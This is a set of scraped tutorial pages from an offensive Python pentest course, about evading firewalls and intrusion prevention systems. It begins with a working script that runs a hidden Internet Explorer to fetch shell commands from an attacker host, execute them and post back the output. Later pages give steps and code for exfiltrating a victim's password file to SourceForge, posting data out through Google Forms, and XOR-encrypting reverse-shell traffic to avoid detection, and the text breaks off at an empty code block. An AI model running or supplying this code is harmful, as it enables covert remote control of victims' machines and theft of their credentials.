[18](https://amandaguglieri.github.io/hackinglife/python/hickjack-internet-explorer-process-to-bypass-an-host-based-firewall/#__codelineno-0-18)
[19](https://amandaguglieri.github.io/hackinglife/python/hickjack-internet-explorer-process-to-bypass-an-host-based-firewall/#__codelineno-0-19)
[20](https://amandaguglieri.github.io/hackinglife/python/hickjack-internet-explorer-process-to-bypass-an-host-based-firewall/#__codelineno-0-20)
[21](https://amandaguglieri.github.io/hackinglife/python/hickjack-internet-explorer-process-to-bypass-an-host-based-firewall/#__codelineno-0-21)
[22](https://amandaguglieri.github.io/hackinglife/python/hickjack-internet-explorer-process-to-bypass-an-host-based-firewall/#__codelineno-0-22)
[23](https://amandaguglieri.github.io/hackinglife/python/hickjack-internet-explorer-process-to-bypass-an-host-based-firewall/#__codelineno-0-23)
[24](https://amandaguglieri.github.io/hackinglife/python/hickjack-internet-explorer-process-to-bypass-an-host-based-firewall/#__codelineno-0-24)
[25](https://amandaguglieri.github.io/hackinglife/python/hickjack-internet-explorer-process-to-bypass-an-host-based-firewall/#__codelineno-0-25)
[26](https://amandaguglieri.github.io/hackinglife/python/hickjack-internet-explorer-process-to-bypass-an-host-based-firewall/#__codelineno-0-26)
[27](https://amandaguglieri.github.io/hackinglife/python/hickjack-internet-explorer-process-to-bypass-an-host-based-firewall/#__codelineno-0-27)
[28](https://amandaguglieri.github.io/hackinglife/python/hickjack-internet-explorer-process-to-bypass-an-host-based-firewall/#__codelineno-0-28)
[29](https://amandaguglieri.github.io/hackinglife/python/hickjack-internet-explorer-process-to-bypass-an-host-based-firewall/#__codelineno-0-29)
[30](https://amandaguglieri.github.io/hackinglife/python/hickjack-internet-explorer-process-to-bypass-an-host-based-firewall/#__codelineno-0-30)
[31](https://amandaguglieri.github.io/hackinglife/python/hickjack-internet-explorer-process-to-bypass-an-host-based-firewall/#__codelineno-0-31)
[32](https://amandaguglieri.github.io/hackinglife/python/hickjack-internet-explorer-process-to-bypass-an-host-based-firewall/#__codelineno-0-32)
[33](https://amandaguglieri.github.io/hackinglife/python/hickjack-internet-explorer-process-to-bypass-an-host-based-firewall/#__codelineno-0-33) | `# Python For Offensive PenTest: A Complete Practical Course - All rights reserved # Follow me on LinkedIn https://jo.linkedin.com/in/python2 from win32com.client import Dispatch from time import sleep import subprocess ie = Dispatch("InternetExplorer.Application") # Create browser instance. ie.Visible = 0 # Make it invisible [ run in background ] (1= visible) # Paramaeters for POST dURL = "http://192.168.0.152" Flags = 0 TargetFrame = 0 while True: ie.Navigate("http://192.168.0.152") # Navigate to our kali web server (the attacker machine) to grab the hacker commands while ie.ReadyState != 4: # Wait for browser to finish loading. sleep(1) command = ie.Document.body.innerHTML command = command.encode() # encode the command if 'terminate' in command.decode(): ie.Quit() # quit the IE and end up the process break else: CMD = subprocess.Popen(command.decode(), shell=True, stdin=subprocess.PIPE, stderr=subprocess.PIPE, stdout=subprocess.PIPE) Data = CMD.stdout.read() PostData = memoryview( Data ) # in order to submit or post data using COM technique , it requires to buffer the data first using memoryview ie.Navigate(dURL, Flags, TargetFrame, PostData) # we post the comamnd execution result along with the post parameters which we defined eariler.. sleep(3)` |
Last update: 2025-04-13
Created: April 10, 2023 16:52:50
Back to top
---
# Bypassing Next Generation Firewalls - Hacking Life
[Skip to content](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/#bypassing-next-generation-firewalls)
Bypassing Next Generation Firewalls
===================================
From course: [Python For Offensive PenTest: A Complete Practical Course](https://www.udemy.com/course/python-for-offensive-security-practical-course/)
.
General index of the course
* Gaining persistence shells (TCP + HTTP):
* [Coding a TCP connection and a reverse shell](https://amandaguglieri.github.io/hackinglife/python/coding-a-tcp-reverse-shell/)
.
* [Coding a low level data exfiltration - TCP connection](https://amandaguglieri.github.io/hackinglife/python/coding-a-low-level-data-exfiltration-tcp/)
.
* [Coding an http reverse shell](https://amandaguglieri.github.io/hackinglife/python/coding-an-http-reverse-shell/)
.
* [Coding a data exfiltration script for a http shell](https://amandaguglieri.github.io/hackinglife/python/coding-a-data-exfiltration-script-http-shell/)
.
* [Tunning the connection attempts](https://amandaguglieri.github.io/hackinglife/python/tunning-the-connection-attemps/)
.
* [Including cd command into TCP reverse shell](https://amandaguglieri.github.io/hackinglife/python/including-cd-command-into-tcp-reverse-shell/)
.
* Advanced scriptable shells:
* [Using a Dynamic DNS instead of your bared attacker public ip](https://amandaguglieri.github.io/hackinglife/python/ddns-aware-shell/)
.
* [Making your binary persistent](https://amandaguglieri.github.io/hackinglife/python/making-your-binary-persistent/)
.
* [Making a screenshot](https://amandaguglieri.github.io/hackinglife/python/making-a-screenshot/)
.
* [Coding a reverse shell that searches files](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-searches-files/)
.
* Techniques for bypassing filters:
* [Coding a reverse shell that scans ports](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/)
.
* [Hickjack the Internet Explorer process to bypass an host-based firewall](https://amandaguglieri.github.io/hackinglife/python/hickjack-internet-explorer-process-to-bypass-an-host-based-firewall/)
.
* [Bypassing Next Generation Firewalls](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/)
.
* [Bypassing IPS with handmade XOR Encryption](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/)
.
* Malware and crytography:
* [TCP reverse shell with AES encryption](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/)
.
* [TCP reverse shell with RSA encryption](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/)
.
* [TCP reverse shell with hybrid encryption AES + RSA](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/)
.
* Password Hickjacking:
* [Simple keylogger in python](https://amandaguglieri.github.io/hackinglife/python/python-keylogger/)
.
* [Hijacking Keepass Password Manager](https://amandaguglieri.github.io/hackinglife/python/hijacking-keepass/)
.
* [Dumping saved passwords from Google Chrome](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/)
.
* [Man in the browser attack](https://amandaguglieri.github.io/hackinglife/python/man-in-the-browser-attack/)
.
* [DNS Poisoning](https://amandaguglieri.github.io/hackinglife/python/dns-poisoning/)
.
* Privilege escalation:
* [Weak service file permission](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/)
.
Corporate firewall (Next Generation Firewalls) can block traffic based on the reputation of the target IP/url. This means that once we achieve to execute the malicious client side script on the victim's machine, this next generation firewall might block/defer the connection if the reputation or the rank of the target URL/IP belongs to a pool of resources supplied by the vendor and it's categorized as low.
To overcome this filter, modern malware is using trusted targets.
Using Source Forge for data exfiltration
----------------------------------------
**1.** Signup in Source Forge
You will get credentials for configuring your SFTP agent in step 3.
**2.** Install filezilla. It will work as our SFTP agent:
| | |
| --- | --- |
| [1](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/#__codelineno-0-1) | `sudo apt-get install filezilla` |
**3.** Configure filezilla and connect.
| | |
| --- | --- |
| [1](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/#__codelineno-1-1)
[2](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/#__codelineno-1-2)
[3](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/#__codelineno-1-3)
[4](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/#__codelineno-1-4) | `Host: web.sourceforge.net username: usernameinSourceForge password: passwordinSourceForge port: 22` |
**4.** Install these two python libraries on the victim's machine: paramiko and scp.
| | |
| --- | --- |
| [1](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/#__codelineno-2-1)
[2](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/#__codelineno-2-2) | `pip install paramiko pip install scp` |
**5.** Run the script on the victim's machine:
| | |
| --- | --- |
| [1](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/#__codelineno-3-1)
[2](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/#__codelineno-3-2)
[3](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/#__codelineno-3-3)
[4](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/#__codelineno-3-4)
[5](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/#__codelineno-3-5)
[6](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/#__codelineno-3-6)
[7](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/#__codelineno-3-7)
[8](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/#__codelineno-3-8)
[9](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/#__codelineno-3-9)
[10](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/#__codelineno-3-10)
[11](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/#__codelineno-3-11)
[12](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/#__codelineno-3-12)
[13](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/#__codelineno-3-13)
[14](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/#__codelineno-3-14)
[15](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/#__codelineno-3-15)
[16](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/#__codelineno-3-16)
[17](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/#__codelineno-3-17)
[18](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/#__codelineno-3-18)
[19](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/#__codelineno-3-19)
[20](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/#__codelineno-3-20)
[21](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/#__codelineno-3-21)
[22](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/#__codelineno-3-22)
[23](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/#__codelineno-3-23)
[24](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/#__codelineno-3-24)
[25](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/#__codelineno-3-25)
[26](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/#__codelineno-3-26)
[27](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/#__codelineno-3-27)
[28](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/#__codelineno-3-28)
[29](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/#__codelineno-3-29)
[30](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/#__codelineno-3-30)
[31](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/#__codelineno-3-31)
[32](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/#__codelineno-3-32)
[33](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/#__codelineno-3-33) | `''' Caution -------- Using this script for any malicious purpose is prohibited and against the law. Please read SourceForge terms and conditions carefully. Use it on your own risk. ''' # Python For Offensive PenTest: A Complete Practical Course - All rights reserved # Follow me on LinkedIn https://jo.linkedin.com/in/python2 import paramiko import scp # File Management on SourceForge # [+] https://sourceforge.net/p/forge/documentation/File%20Management/ ssh_client = paramiko.SSHClient() # creating an ssh_client instance using paramiko sshclient class ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) ssh_client.connect("web.sourceforge.net", username="myusernameatSourceForge", password="PASSWORD HERE") #Authenticate ourselves to the sourceforge. Server, user and password from step 1 print ("[+] Authenticating against web.sourceforge.net") scp = scp.SCPClient(ssh_client.get_transport()) #after a sucessful authentication the ssh session id will be passed into SCPClient function scp.put("C:/Users/Alex/Desktop/passwords.txt") # upload a file, for instance password.txt print ("[+} File is uploaded") scp.close() print("[+] Closing the socket")` |\
\
Using Google Forms for submitting output\
----------------------------------------\
\
**1.** Create a Google Form with a quick test and copy the link of the survey.\
\
**2.** Copy the name of the form from the source code of the google form.\
\
\
\
**3.** Paste URL of the survey + name of the form in the script:\
\
| | |\
| --- | --- |\
| [1](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/#__codelineno-4-1)
[2](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/#__codelineno-4-2)
[3](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/#__codelineno-4-3)
[4](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/#__codelineno-4-4)
[5](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/#__codelineno-4-5)
[6](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/#__codelineno-4-6)
[7](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/#__codelineno-4-7)
[8](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/#__codelineno-4-8)
[9](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/#__codelineno-4-9)
[10](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/#__codelineno-4-10)
[11](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/#__codelineno-4-11)
[12](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/#__codelineno-4-12)
[13](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/#__codelineno-4-13)
[14](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/#__codelineno-4-14)
[15](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/#__codelineno-4-15)
[16](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/#__codelineno-4-16)
[17](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/#__codelineno-4-17)
[18](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/#__codelineno-4-18)
[19](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/#__codelineno-4-19)
[20](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/#__codelineno-4-20)
[21](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/#__codelineno-4-21)
[22](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/#__codelineno-4-22) | `''' Caution -------- Using this script for any malicious purpose is prohibited and against the law. Please read Google terms and conditions carefully. Use it on your own risk. ''' # Python For Offensive PenTest: A Complete Practical Course - All rights reserved # Follow me on LinkedIn https://jo.linkedin.com/in/python2 import requests url = 'https://docs.google.com/forms/d/1Ndjnm5YViqIYXyIuoTHsCqW_YfGa-vaaKEahY2cc5cs/formResponse' form_data = {'entry.1301128713':'Lets see how we can use this, in the next exercise'} r = requests.post(url, data=form_data) # Submitting form-encoded data in requests:- # http://docs.python-requests.org/en/latest/user/quickstart/#more-complicated-post-requests` |\
\
### Exercise\
\
| | |\
| --- | --- |\
| [1](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/#__codelineno-5-1) | `Try to combine the above ideas (Google Form + Twitter + SourceForge) Into a single script and see if you can control your target without direct interaction.` |\
\
Last update: 2024-03-29 \
Created: April 10, 2023 16:52:50\
\
Back to top
---
# Bypassing IPS with handmade XOR Encryption - Hacking Life
[Skip to content](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#bypassing-ips-with-handmade-xor-encryption)
Bypassing IPS with handmade XOR Encryption
==========================================
From course: [Python For Offensive PenTest: A Complete Practical Course](https://www.udemy.com/course/python-for-offensive-security-practical-course/)
.
General index of the course
* Gaining persistence shells (TCP + HTTP):
* [Coding a TCP connection and a reverse shell](https://amandaguglieri.github.io/hackinglife/python/coding-a-tcp-reverse-shell/)
.
* [Coding a low level data exfiltration - TCP connection](https://amandaguglieri.github.io/hackinglife/python/coding-a-low-level-data-exfiltration-tcp/)
.
* [Coding an http reverse shell](https://amandaguglieri.github.io/hackinglife/python/coding-an-http-reverse-shell/)
.
* [Coding a data exfiltration script for a http shell](https://amandaguglieri.github.io/hackinglife/python/coding-a-data-exfiltration-script-http-shell/)
.
* [Tunning the connection attempts](https://amandaguglieri.github.io/hackinglife/python/tunning-the-connection-attemps/)
.
* [Including cd command into TCP reverse shell](https://amandaguglieri.github.io/hackinglife/python/including-cd-command-into-tcp-reverse-shell/)
.
* Advanced scriptable shells:
* [Using a Dynamic DNS instead of your bared attacker public ip](https://amandaguglieri.github.io/hackinglife/python/ddns-aware-shell/)
.
* [Making your binary persistent](https://amandaguglieri.github.io/hackinglife/python/making-your-binary-persistent/)
.
* [Making a screenshot](https://amandaguglieri.github.io/hackinglife/python/making-a-screenshot/)
.
* [Coding a reverse shell that searches files](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-searches-files/)
.
* Techniques for bypassing filters:
* [Coding a reverse shell that scans ports](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/)
.
* [Hickjack the Internet Explorer process to bypass an host-based firewall](https://amandaguglieri.github.io/hackinglife/python/hickjack-internet-explorer-process-to-bypass-an-host-based-firewall/)
.
* [Bypassing Next Generation Firewalls](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/)
.
* [Bypassing IPS with handmade XOR Encryption](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/)
.
* Malware and crytography:
* [TCP reverse shell with AES encryption](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/)
.
* [TCP reverse shell with RSA encryption](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/)
.
* [TCP reverse shell with hybrid encryption AES + RSA](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/)
.
* Password Hickjacking:
* [Simple keylogger in python](https://amandaguglieri.github.io/hackinglife/python/python-keylogger/)
.
* [Hijacking Keepass Password Manager](https://amandaguglieri.github.io/hackinglife/python/hijacking-keepass/)
.
* [Dumping saved passwords from Google Chrome](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/)
.
* [Man in the browser attack](https://amandaguglieri.github.io/hackinglife/python/man-in-the-browser-attack/)
.
* [DNS Poisoning](https://amandaguglieri.github.io/hackinglife/python/dns-poisoning/)
.
* Privilege escalation:
* [Weak service file permission](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/)
.
The idea is to encrypt our traffic to avoid network analyzers or intrusion prevention sensors. SSL or SSH is not recommended here since Next Generation Firewalls have the ability to decrypt them and pass it as plain text to the IPS, where it will be recognized.
* Create a secret key of 1Kb that matches the size of the socket, to make a XOR operation to encrypt the message
| | |
| --- | --- |
| [1](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-0-1)
[2](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-0-2)
[3](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-0-3)
[4](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-0-4)
[5](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-0-5)
[6](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-0-6)
[7](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-0-7)
[8](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-0-8)
[9](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-0-9)
[10](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-0-10)
[11](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-0-11)
[12](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-0-12)
[13](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-0-13)
[14](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-0-14)
[15](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-0-15)
[16](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-0-16)
[17](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-0-17)
[18](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-0-18)
[19](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-0-19)
[20](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-0-20)
[21](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-0-21)
[22](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-0-22)
[23](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-0-23)
[24](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-0-24)
[25](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-0-25)
[26](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-0-26)
[27](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-0-27)
[28](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-0-28)
[29](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-0-29)
[30](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-0-30)
[31](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-0-31)
[32](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-0-32)
[33](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-0-33)
[34](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-0-34)
[35](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-0-35)
[36](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-0-36)
[37](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-0-37)
[38](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-0-38)
[39](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-0-39)
[40](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-0-40)
[41](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-0-41) | `# Python For Offensive PenTest: A Complete Practical Course - All rights reserved # Follow me on LinkedIn https://jo.linkedin.com/in/python2 # The random and string libraries are used to generate a random string with flexible criteria import string import random # Random Key Generator key = ''.join(random.choice(string.ascii_lowercase + string.ascii_uppercase + string.digits + '^!\$%&/()=?{[]}+~#-_.:,;<>\|\\') for _ in range(0, 1024)) print(key) print ("\n" + "Key length = " + str(len(key))) message = 'ipconfig' print("Msg: " + message + '\n') # here i defined a dedicated function called str_xor, we will pass two values to this fucntion, the first value is the message(s1) that we want to encrypt or decrypt, and the second paramter is the xor key(s2). We were able to bind the encryption and the decryption phases in one function because the xor operation is exactly the same when we encrypt or decrpyt, the only difference is that when we encrypt we pass the message in clear text and when we want to decrypt we pass the encrypted message def str_xor(s1, s2): return "".join([chr(ord(c1) ^ ord(c2)) for (c1, c2) in zip(s1,s2)]) # first we split the message and the xor key to a list of character pair in tuples format >> for (c1,c2) in zip(s1,s2) # next we will go through each tuple, and converting them to integer using (ord) function, once they converted into integers we can now perform exclusive OR on them >> ord(c1) ^ ord(c2) # then convert the result back to ASCII using (chr) function >> chr(ord(c1) ^ ord(c2)) # last step we will merge the resulting array of characters as a sequqnece string using >>> "".join function enc = str_xor(message, key) print("Encrypted message is " + "\n" + enc + "\n") dec = str_xor(enc, key) print("Decrypted message is " + "\n" + dec + "\n")` |
To integrate XOR encryption into [this client side Python script](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-searches-files/)
, you can modify the script to encrypt and decrypt the communication between the client and the server using the XOR encryption algorithm.
Here is an example of how to modify the script to incorporate XOR encryption:
| | |
| --- | --- |
| [1](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-1-1)
[2](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-1-2)
[3](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-1-3)
[4](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-1-4)
[5](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-1-5)
[6](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-1-6)
[7](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-1-7)
[8](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-1-8)
[9](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-1-9)
[10](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-1-10)
[11](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-1-11)
[12](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-1-12)
[13](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-1-13)
[14](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-1-14)
[15](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-1-15)
[16](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-1-16)
[17](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-1-17)
[18](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-1-18)
[19](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-1-19)
[20](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-1-20)
[21](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-1-21)
[22](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-1-22)
[23](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-1-23)
[24](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-1-24)
[25](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-1-25)
[26](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-1-26)
[27](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-1-27)
[28](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-1-28)
[29](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-1-29)
[30](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-1-30)
[31](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-1-31)
[32](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-1-32)
[33](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-1-33)
[34](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-1-34)
[35](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-1-35)
[36](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/#__codelineno-1-36)
